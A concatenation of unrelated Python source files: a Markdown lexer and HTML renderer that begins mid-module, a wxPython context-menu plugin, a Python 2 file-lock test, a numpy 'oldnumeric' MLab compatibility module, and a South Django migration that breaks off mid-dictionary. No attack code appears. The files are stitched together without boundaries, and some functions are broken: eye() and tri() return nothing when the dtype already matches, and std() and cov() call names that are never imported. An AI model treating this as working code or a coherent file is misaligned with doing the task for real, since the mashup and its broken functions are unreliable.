class InlineGrammar(object):
    """Grammars for inline level tokens."""

    escape = re.compile(r'^\\([\\`*{}\[\]()#+\-.!_>~|])')  # \* \+ \! ....
    inline_html = re.compile(
        r'^(?:%s|%s|%s)' % (
            r'<!--[\s\S]*?-->',
            r'<(\w+%s)((?:%s)*?)\s*>([\s\S]*?)<\/\1>' % (_valid_end, _valid_attr),
            r'<\w+%s(?:%s)*?\s*\/?>' % (_valid_end, _valid_attr),
        )
    )
    autolink = re.compile(r'^<([^ >]+(@|:)[^ >]+)>')
    link = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\('
        r'''\s*(<)?([\s\S]*?)(?(2)>)(?:\s+['"]([\s\S]*?)['"])?\s*'''
        r'\)'
    )
    reflink = re.compile(
        r'^!?\[('
        r'(?:\[[^^\]]*\]|[^\[\]]|\](?=[^\[]*\]))*'
        r')\]\s*\[([^^\]]*)\]'
    )
    nolink = re.compile(r'^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]')
    url = re.compile(r'''^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])''')
    double_emphasis = re.compile(
        r'^_{2}([\s\S]+?)_{2}(?!_)'  # __word__
        r'|'
        r'^\*{2}([\s\S]+?)\*{2}(?!\*)'  # **word**
    )
    emphasis = re.compile(
        r'^\b_((?:__|[^_])+?)_\b'  # _word_
        r'|'
        r'^\*((?:\*\*|[^\*])+?)\*(?!\*)'  # *word*
    )
    code = re.compile(r'^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)')  # `code`
    linebreak = re.compile(r'^ {2,}\n(?!\s*$)')
    strikethrough = re.compile(r'^~~(?=\S)([\s\S]*?\S)~~')  # ~~word~~
    footnote = re.compile(r'^\[\^([^\]]+)\]')
    text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| {2,}\n|$)')

    def hard_wrap(self):
        """Grammar for hard wrap linebreak. You don't need to add two
        spaces at the end of a line.
        """
        self.linebreak = re.compile(r'^ *\n(?!\s*$)')
        self.text = re.compile(
            r'^[\s\S]+?(?=[\\<!\[_*`~]|https?://| *\n|$)'
        )


class InlineLexer(object):
    """Inline level lexer for inline grammars."""
    grammar_class = InlineGrammar

    default_rules = [
        'escape', 'inline_html', 'autolink', 'url',
        'footnote', 'link', 'reflink', 'nolink',
        'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]
    inline_html_rules = [
        'escape', 'autolink', 'url', 'link', 'reflink',
        'nolink', 'double_emphasis', 'emphasis', 'code',
        'linebreak', 'strikethrough', 'text',
    ]

    def __init__(self, renderer, rules=None, **kwargs):
        self.renderer = renderer
        self.links = {}
        self.footnotes = {}
        self.footnote_index = 0

        if not rules:
            rules = self.grammar_class()

        kwargs.update(self.renderer.options)
        if kwargs.get('hard_wrap'):
            rules.hard_wrap()

        self.rules = rules

        self._in_link = False
        self._in_footnote = False
        self._parse_inline_html = kwargs.get('parse_inline_html')

    def __call__(self, text, rules=None):
        return self.output(text, rules)

    def setup(self, links, footnotes):
        self.footnote_index = 0
        self.links = links or {}
        self.footnotes = footnotes or {}

    def output(self, text, rules=None):
        text = text.rstrip('\n')
        if not rules:
            rules = list(self.default_rules)

        if self._in_footnote and 'footnote' in rules:
            rules.remove('footnote')

        output = self.renderer.placeholder()

        def manipulate(text):
            for key in rules:
                pattern = getattr(self.rules, key)
                m = pattern.match(text)
                if not m:
                    continue
                self.line_match = m
                out = getattr(self, 'output_%s' % key)(m)
                if out is not None:
                    return m, out
            return False  # pragma: no cover

        while text:
            ret = manipulate(text)
            if ret is not False:
                m, out = ret
                output += out
                text = text[len(m.group(0)):]
                continue
            if text:  # pragma: no cover
                raise RuntimeError('Infinite loop at: %s' % text)

        return output

    def output_escape(self, m):
        text = m.group(1)
        return self.renderer.escape(text)

    def output_autolink(self, m):
        link = m.group(1)
        if m.group(2) == '@':
            is_email = True
        else:
            is_email = False
        return self.renderer.autolink(link, is_email)

    def output_url(self, m):
        link = m.group(1)
        if self._in_link:
            return self.renderer.text(link)
        return self.renderer.autolink(link, False)

    def output_inline_html(self, m):
        tag = m.group(1)
        if self._parse_inline_html and tag in _inline_tags:
            text = m.group(3)
            if tag == 'a':
                self._in_link = True
                text = self.output(text, rules=self.inline_html_rules)
                self._in_link = False
            else:
                text = self.output(text, rules=self.inline_html_rules)
            extra = m.group(2) or ''
            html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        else:
            html = m.group(0)
        return self.renderer.inline_html(html)

    def output_footnote(self, m):
        key = _keyify(m.group(1))
        if key not in self.footnotes:
            return None
        if self.footnotes[key]:
            return None
        self.footnote_index += 1
        self.footnotes[key] = self.footnote_index
        return self.renderer.footnote_ref(key, self.footnote_index)

    def output_link(self, m):
        return self._process_link(m, m.group(3), m.group(4))

    def output_reflink(self, m):
        key = _keyify(m.group(2) or m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def output_nolink(self, m):
        key = _keyify(m.group(1))
        if key not in self.links:
            return None
        ret = self.links[key]
        return self._process_link(m, ret['link'], ret['title'])

    def _process_link(self, m, link, title=None):
        line = m.group(0)
        text = m.group(1)
        if line[0] == '!':
            return self.renderer.image(link, title, text)

        self._in_link = True
        text = self.output(text)
        self._in_link = False
        return self.renderer.link(link, title, text)

    def output_double_emphasis(self, m):
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.double_emphasis(text)

    def output_emphasis(self, m):
        text = m.group(2) or m.group(1)
        text = self.output(text)
        return self.renderer.emphasis(text)

    def output_code(self, m):
        text = m.group(2)
        return self.renderer.codespan(text)

    def output_linebreak(self, m):
        return self.renderer.linebreak()

    def output_strikethrough(self, m):
        text = self.output(m.group(1))
        return self.renderer.strikethrough(text)

    def output_text(self, m):
        text = m.group(0)
        return self.renderer.text(text)


class Renderer(object):
    """The default HTML renderer for rendering Markdown.
    """

    def __init__(self, **kwargs):
        self.options = kwargs

    def placeholder(self):
        """Returns the default, empty output value for the renderer.

        All renderer methods use the '+=' operator to append to this value.
        Default is a string so rendering HTML can build up a result string with
        the rendered Markdown.

        Can be overridden by Renderer subclasses to be types like an empty
        list, allowing the renderer to create a tree-like structure to
        represent the document (which can then be reprocessed later into a
        separate format like docx or pdf).
        """
        return ''

    def block_code(self, code, lang=None):
        """Rendering block level code. ``pre > code``.

        :param code: text content of the code block.
        :param lang: language of the given code.
        """
        code = code.rstrip('\n')
        if not lang:
            code = escape(code, smart_amp=False)
            return '<pre><code>%s\n</code></pre>\n' % code
        code = escape(code, quote=True, smart_amp=False)
        return '<pre><code class="lang-%s">%s\n</code></pre>\n' % (lang, code)

    def block_quote(self, text):
        """Rendering <blockquote> with the given text.

        :param text: text content of the blockquote.
        """
        return '<blockquote>%s\n</blockquote>\n' % text.rstrip('\n')

    def block_html(self, html):
        """Rendering block level pure html content.

        :param html: text content of the html snippet.
        """
        if self.options.get('skip_style') and \
           html.lower().startswith('<style'):
            return ''
        if self.options.get('escape'):
            return escape(html)
        return html

    def header(self, text, level, raw=None):
        """Rendering header/heading tags like ``<h1>`` ``<h2>``.

        :param text: rendered text content for the header.
        :param level: a number for the header level, for example: 1.
        :param raw: raw text content of the header.
        """
        return '<h%d>%s</h%d>\n' % (level, text, level)

    def hrule(self):
        """Rendering method for ``<hr>`` tag."""
        if self.options.get('use_xhtml'):
            return '<hr />\n'
        return '<hr>\n'

    def list(self, body, ordered=True):
        """Rendering list tags like ``<ul>`` and ``<ol>``.

        :param body: body contents of the list.
        :param ordered: whether this list is ordered or not.
        """
        tag = 'ul'
        if ordered:
            tag = 'ol'
        return '<%s>\n%s</%s>\n' % (tag, body, tag)

    def list_item(self, text):
        """Rendering list item snippet. Like ``<li>``."""
        return '<li>%s</li>\n' % text

    def paragraph(self, text):
        """Rendering paragraph tags. Like ``<p>``."""
        return '<p>%s</p>\n' % text.strip(' ')

    def table(self, header, body):
        """Rendering table element. Wrap header and body in it.

        :param header: header part of the table.
        :param body: body part of the table.
        """
        return (
            '<table>\n<thead>%s</thead>\n'
            '<tbody>\n%s</tbody>\n</table>\n'
        ) % (header, body)

    def table_row(self, content):
        """Rendering a table row. Like ``<tr>``.

        :param content: content of current table row.
        """
        return '<tr>\n%s</tr>\n' % content

    def table_cell(self, content, **flags):
        """Rendering a table cell. Like ``<th>`` ``<td>``.

        :param content: content of current table cell.
        :param header: whether this is header or not.
        :param align: align of current table cell.
        """
        if flags['header']:
            tag = 'th'
        else:
            tag = 'td'
        align = flags['align']
        if not align:
            return '<%s>%s</%s>\n' % (tag, content, tag)
        return '<%s style="text-align:%s">%s</%s>\n' % (
            tag, align, content, tag
        )

    def double_emphasis(self, text):
        """Rendering **strong** text.

        :param text: text content for emphasis.
        """
        return '<strong>%s</strong>' % text

    def emphasis(self, text):
        """Rendering *emphasis* text.

        :param text: text content for emphasis.
        """
        return '<em>%s</em>' % text

    def codespan(self, text):
        """Rendering inline `code` text.

        :param text: text content for inline code.
        """
        text = escape(text.rstrip(), smart_amp=False)
        return '<code>%s</code>' % text

    def linebreak(self):
        """Rendering line break like ``<br>``."""
        if self.options.get('use_xhtml'):
            return '<br />\n'
        return '<br>\n'

    def strikethrough(self, text):
        """Rendering ~~strikethrough~~ text.

        :param text: text content for strikethrough.
        """
        return '<del>%s</del>' % text

    def text(self, text):
        """Rendering unformatted text.

        :param text: text content.
        """
        if self.options.get('parse_block_html'):
            return text
        return escape(text)

    def escape(self, text):
        """Rendering escape sequence.

        :param text: text content.
        """
        return escape(text)

    def autolink(self, link, is_email=False):
        """Rendering a given link or email address.

        :param link: link content or email address.
        :param is_email: whether this is an email or not.
        """
        text = link = escape(link)
        if is_email:
            link = 'mailto:%s' % link
        return '<a href="%s">%s</a>' % (link, text)

    def link(self, link, title, text):
        """Rendering a given link with content and title.

        :param link: href link for ``<a>`` tag.
        :param title: title content for `title` attribute.
        :param text: text content for description.
        """
        link = escape_link(link)
        if not title:
            return '<a href="%s">%s</a>' % (link, text)
        title = escape(title, quote=True)
        return '<a href="%s" title="%s">%s</a>' % (link, title, text)

    def image(self, src, title, text):
        """Rendering a image with title and text.

        :param src: source link of the image.
        :param title: title text of the image.
        :param text: alt text of the image.
        """
        src = escape_link(src)
        text = escape(text, quote=True)
        if title:
            title = escape(title, quote=True)
            html = '<img src="%s" alt="%s" title="%s"' % (src, text, title)
        else:
            html = '<img src="%s" alt="%s"' % (src, text)
        if self.options.get('use_xhtml'):
            return '%s />' % html
        return '%s>' % html

    def inline_html(self, html):
        """Rendering span level pure html content.

        :param html: text content of the html snippet.
        """
        if self.options.get('escape'):
            return escape(html)
        return html

    def newline(self):
        """Rendering newline element."""
        return ''

    def footnote_ref(self, key, index):
        """Rendering the ref anchor of a footnote.

        :param key: identity key for the footnote.
        :param index: the index count of current footnote.
        """
        html = (
            '<sup class="footnote-ref" id="fnref-%s">'
            '<a href="#fn-%s" rel="footnote">%d</a></sup>'
        ) % (escape(key), escape(key), index)
        return html

    def footnote_item(self, key, text):
        """Rendering a footnote item.

        :param key: identity key for the footnote.
        :param text: text content of the footnote.
        """
        back = (
            '<a href="#fnref-%s" rev="footnote">&#8617;</a>'
        ) % escape(key)
        text = text.rstrip()
        if text.endswith('</p>'):
            text = re.sub(r'<\/p>$', r'%s</p>' % back, text)
        else:
            text = '%s<p>%s</p>' % (text, back)
        html = '<li id="fn-%s">%s</li>\n' % (escape(key), text)
        return html

    def footnotes(self, text):
        """Wrapper for all footnotes.

        :param text: contents of all footnotes.
        """
        html = '<div class="footnotes">\n%s<ol>%s</ol>\n</div>\n'
        return html % (self.hrule(), text)


class Markdown(object):
    """The Markdown parser.

    :param renderer: An instance of ``Renderer``.
    :param inline: An inline lexer class or instance.
    :param block: A block lexer class or instance.
    """
    def __init__(self, renderer=None, inline=None, block=None, **kwargs):
        if not renderer:
            renderer = Renderer(**kwargs)
        else:
            kwargs.update(renderer.options)

        self.renderer = renderer

        if inline and inspect.isclass(inline):
            inline = inline(renderer, **kwargs)
        if block and inspect.isclass(block):
            block = block(**kwargs)

        if inline:
            self.inline = inline
        else:
            self.inline = InlineLexer(renderer, **kwargs)

        self.block = block or BlockLexer(BlockGrammar())
        self.footnotes = []
        self.tokens = []

        # detect if it should parse text in block html
        self._parse_block_html = kwargs.get('parse_block_html')

    def __call__(self, text):
        return self.parse(text)

    def render(self, text):
        """Render the Markdown text.

        :param text: markdown formatted text content.
        """
        return self.parse(text)

    def parse(self, text):
        out = self.output(preprocessing(text))

        keys = self.block.def_footnotes

        # reset block
        self.block.def_links = {}
        self.block.def_footnotes = {}

        # reset inline
        self.inline.links = {}
        self.inline.footnotes = {}

        if not self.footnotes:
            return out

        footnotes = filter(lambda o: keys.get(o['key']), self.footnotes)
        self.footnotes = sorted(
            footnotes, key=lambda o: keys.get(o['key']), reverse=True
        )

        body = self.renderer.placeholder()
        while self.footnotes:
            note = self.footnotes.pop()
            body += self.renderer.footnote_item(
                note['key'], note['text']
            )

        out += self.renderer.footnotes(body)
        return out

    def pop(self):
        if not self.tokens:
            return None
        self.token = self.tokens.pop()
        return self.token

    def peek(self):
        if self.tokens:
            return self.tokens[-1]
        return None  # pragma: no cover

    def output(self, text, rules=None):
        self.tokens = self.block(text, rules)
        self.tokens.reverse()

        self.inline.setup(self.block.def_links, self.block.def_footnotes)

        out = self.renderer.placeholder()
        while self.pop():
            out += self.tok()
        return out

    def tok(self):
        t = self.token['type']

        # sepcial cases
        if t.endswith('_start'):
            t = t[:-6]

        return getattr(self, 'output_%s' % t)()

    def tok_text(self):
        text = self.token['text']
        while self.peek()['type'] == 'text':
            text += '\n' + self.pop()['text']
        return self.inline(text)

    def output_newline(self):
        return self.renderer.newline()

    def output_hrule(self):
        return self.renderer.hrule()

    def output_heading(self):
        return self.renderer.header(
            self.inline(self.token['text']),
            self.token['level'],
            self.token['text'],
        )

    def output_code(self):
        return self.renderer.block_code(
            self.token['text'], self.token['lang']
        )

    def output_table(self):
        aligns = self.token['align']
        aligns_length = len(aligns)
        cell = self.renderer.placeholder()

        # header part
        header = self.renderer.placeholder()
        for i, value in enumerate(self.token['header']):
            align = aligns[i] if i < aligns_length else None
            flags = {'header': True, 'align': align}
            cell += self.renderer.table_cell(self.inline(value), **flags)

        header += self.renderer.table_row(cell)

        # body part
        body = self.renderer.placeholder()
        for i, row in enumerate(self.token['cells']):
            cell = self.renderer.placeholder()
            for j, value in enumerate(row):
                align = aligns[j] if j < aligns_length else None
                flags = {'header': False, 'align': align}
                cell += self.renderer.table_cell(self.inline(value), **flags)
            body += self.renderer.table_row(cell)

        return self.renderer.table(header, body)

    def output_block_quote(self):
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'block_quote_end':
            body += self.tok()
        return self.renderer.block_quote(body)

    def output_list(self):
        ordered = self.token['ordered']
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_end':
            body += self.tok()
        return self.renderer.list(body, ordered)

    def output_list_item(self):
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            if self.token['type'] == 'text':
                body += self.tok_text()
            else:
                body += self.tok()

        return self.renderer.list_item(body)

    def output_loose_item(self):
        body = self.renderer.placeholder()
        while self.pop()['type'] != 'list_item_end':
            body += self.tok()
        return self.renderer.list_item(body)

    def output_footnote(self):
        self.inline._in_footnote = True
        body = self.renderer.placeholder()
        key = self.token['key']
        while self.pop()['type'] != 'footnote_end':
            body += self.tok()
        self.footnotes.append({'key': key, 'text': body})
        self.inline._in_footnote = False
        return self.renderer.placeholder()

    def output_close_html(self):
        text = self.token['text']
        return self.renderer.block_html(text)

    def output_open_html(self):
        text = self.token['text']
        tag = self.token['tag']
        if self._parse_block_html and tag not in _pre_tags:
            text = self.inline(text, rules=self.inline.inline_html_rules)
        extra = self.token.get('extra') or ''
        html = '<%s%s>%s</%s>' % (tag, extra, text, tag)
        return self.renderer.block_html(html)

    def output_paragraph(self):
        return self.renderer.paragraph(self.inline(self.token['text']))

    def output_text(self):
        return self.renderer.paragraph(self.tok_text())


def markdown(text, escape=True, **kwargs):
    """Render markdown formatted text to html.

    :param text: markdown formatted text content.
    :param escape: if set to False, all html tags will not be escaped.
    :param use_xhtml: output with xhtml tags.
    :param hard_wrap: if set to True, it will use the GFM line breaks feature.
    :param parse_block_html: parse text only in block level html.
    :param parse_inline_html: parse text only in inline level html.
    """
    return Markdown(escape=escape, **kwargs)(text)
# noinspection PyPackageRequirements
import wx

import gui.globalEvents as GE
import gui.mainFrame
from gui.contextMenu import ContextMenuSingle
from service.fit import Fit


class AmmoToDmgPattern(ContextMenuSingle):

    visibilitySetting = 'ammoPattern'

    def __init__(self):
        self.mainFrame = gui.mainFrame.MainFrame.getInstance()

    def display(self, callingWindow, srcContext, mainItem):
        if srcContext not in ("marketItemGroup", "marketItemMisc") or self.mainFrame.getActiveFit() is None:
            return False

        if mainItem is None:
            return False

        for attr in ("emDamage", "thermalDamage", "explosiveDamage", "kineticDamage"):
            if mainItem.getAttribute(attr) is not None:
                return True

        return False

    def getText(self, callingWindow, itmContext, mainItem):
        return "Set {} as Damage Pattern".format(itmContext if itmContext is not None else "Item")

    def activate(self, callingWindow, fullContext, mainItem, i):
        fitID = self.mainFrame.getActiveFit()
        Fit.getInstance().setAsPattern(fitID, mainItem)
        wx.PostEvent(self.mainFrame, GE.FitChanged(fitIDs=(fitID,)))

    def getBitmap(self, callingWindow, context, mainItem):
        return None


AmmoToDmgPattern.register()

"""import portalocker

with portalocker.Lock('text.txt', timeout=5) as fh:
    fh.write("Sono in testLoxk2.py")
"""
from lockfile import LockFile

lock = LockFile('text.txt')
with lock:
    print lock.path, 'is locked.'
    with open('text.txt', "a") as file:
        file.write("Sono in testLock2.py")

# This module is for compatibility only.  All functions are defined elsewhere.

__all__ = ['rand', 'tril', 'trapz', 'hanning', 'rot90', 'triu', 'diff', 'angle',
           'roots', 'ptp', 'kaiser', 'randn', 'cumprod', 'diag', 'msort',
           'LinearAlgebra', 'RandomArray', 'prod', 'std', 'hamming', 'flipud',
           'max', 'blackman', 'corrcoef', 'bartlett', 'eye', 'squeeze', 'sinc',
           'tri', 'cov', 'svd', 'min', 'median', 'fliplr', 'eig', 'mean']

import numpy.oldnumeric.linear_algebra as LinearAlgebra
import numpy.oldnumeric.random_array as RandomArray
from numpy import tril, trapz as _Ntrapz, hanning, rot90, triu, diff, \
     angle, roots, ptp as _Nptp, kaiser, cumprod as _Ncumprod, \
     diag, msort, prod as _Nprod, std as _Nstd, hamming, flipud, \
     amax as _Nmax, amin as _Nmin, blackman, bartlett, \
     squeeze, sinc, median, fliplr, mean as _Nmean, transpose

from numpy.linalg import eig, svd
from numpy.random import rand, randn
import numpy as np

from typeconv import convtypecode

def eye(N, M=None, k=0, typecode=None, dtype=None):
    """ eye returns a N-by-M 2-d array where the  k-th diagonal is all ones,
        and everything else is zeros.
    """
    dtype = convtypecode(typecode, dtype)
    if M is None: M = N
    m = np.equal(np.subtract.outer(np.arange(N), np.arange(M)),-k)
    if m.dtype != dtype:
        return m.astype(dtype)

def tri(N, M=None, k=0, typecode=None, dtype=None):
    """ returns a N-by-M array where all the diagonals starting from
        lower left corner up to the k-th are all ones.
    """
    dtype = convtypecode(typecode, dtype)
    if M is None: M = N
    m = np.greater_equal(np.subtract.outer(np.arange(N), np.arange(M)),-k)
    if m.dtype != dtype:
        return m.astype(dtype)

def trapz(y, x=None, axis=-1):
    return _Ntrapz(y, x, axis=axis)

def ptp(x, axis=0):
    return _Nptp(x, axis)

def cumprod(x, axis=0):
    return _Ncumprod(x, axis)

def max(x, axis=0):
    return _Nmax(x, axis)

def min(x, axis=0):
    return _Nmin(x, axis)

def prod(x, axis=0):
    return _Nprod(x, axis)

def std(x, axis=0):
    N = asarray(x).shape[axis]
    return _Nstd(x, axis)*sqrt(N/(N-1.))

def mean(x, axis=0):
    return _Nmean(x, axis)

# This is exactly the same cov function as in MLab
def cov(m, y=None, rowvar=0, bias=0):
    if y is None:
        y = m
    else:
        y = y
    if rowvar:
        m = transpose(m)
        y = transpose(y)
    if (m.shape[0] == 1):
        m = transpose(m)
    if (y.shape[0] == 1):
        y = transpose(y)
    N = m.shape[0]
    if (y.shape[0] != N):
        raise ValueError("x and y must have the same number of observations")
    m = m - _Nmean(m,axis=0)
    y = y - _Nmean(y,axis=0)
    if bias:
        fact = N*1.0
    else:
        fact = N-1.0
    return squeeze(dot(transpose(m), conjugate(y)) / fact)

from numpy import sqrt, multiply
def corrcoef(x, y=None):
    c = cov(x, y)
    d = diag(c)
    return c/sqrt(multiply.outer(d,d))

from compat import *
from functions import *
from precision import *
from ufuncs import *
from misc import *

import compat
import precision
import functions
import misc
import ufuncs

import numpy
__version__ = numpy.__version__
del numpy

__all__ += ['__version__']
__all__ += compat.__all__
__all__ += precision.__all__
__all__ += functions.__all__
__all__ += ufuncs.__all__
__all__ += misc.__all__

del compat
del functions
del precision
del ufuncs
del misc

# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'ArticleComment'
        db.create_table('cms_articlecomment', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('article', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cms.Article'])),
            ('created_at', self.gf('django.db.models.fields.DateField')(auto_now_add=True, blank=True)),
            ('author', self.gf('django.db.models.fields.CharField')(max_length=60)),
            ('comment', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('cms', ['ArticleComment'])


    def backwards(self, orm):
        # Deleting model 'ArticleComment'
        db.delete_table('cms_articlecomment')


    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'cms.article': {
            'Meta': {'ordering': "['title']", 'object_name': 'Article'},
            'allow_comments': ('django.db.models.fields.CharField', [], {'default': "'N'", 'max_length': '1'}),
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'content': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'conversions': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'created_at': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
            'header': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'keywords': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'sections': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['cms.Section']", 'null': 'True', 'through': "orm['cms.SectionItem']", 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '250', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'updated_at': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'cms.articlearchive': {
            'Meta': {'ordering': "('updated_at',)", 'object_name': 'ArticleArchive'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'content': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'header': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'cms.articlecomment': {
            'Meta': {'ordering': "('created_at',)", 'object_name': 'ArticleComment'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'author': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
            'comment': ('django.db.models.fields.TextField', [], {}),
            'created_at': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'cms.filedownload': {
            'Meta': {'object_name': 'FileDownload'},
            'count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'file': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.File']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'uuid': ('uuidfield.fields.UUIDField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'})
        },
        'cms.menu': {
            'Meta': {'object_name': 'Menu'},
            'article': ('smart_selects.db_fields.ChainedForeignKey', [], {'default': 'None', 'to': "orm['cms.Article']", 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'link': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
            'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['cms.Menu']"}),
            u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'section': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Section']", 'null': 'True', 'blank': 'True'}),
            u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'cms.section': {
            'Meta': {'ordering': "['title']", 'object_name': 'Section'},
            'articles': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['cms.Article']", 'null': 'True', 'through': "orm['cms.SectionItem']", 'blank': 'True'}),
            'conversions': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'header': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'keywords': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '250', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'cms.sectionitem': {
            'Meta': {'ordering': "['order']", 'object_name': 'SectionItem'},
            'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Article']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
            'section': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Section']"})
        },
        'cms.urlmigrate': {
            'Meta': {'object_name': 'URLMigrate'},
            'dtupdate': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'new_url': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
            'obs': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'old_url': ('django.db.models.fields.CharField', [], {'max_length': '250', 'db_index': 'True'}),
            'redirect_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
            'views': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
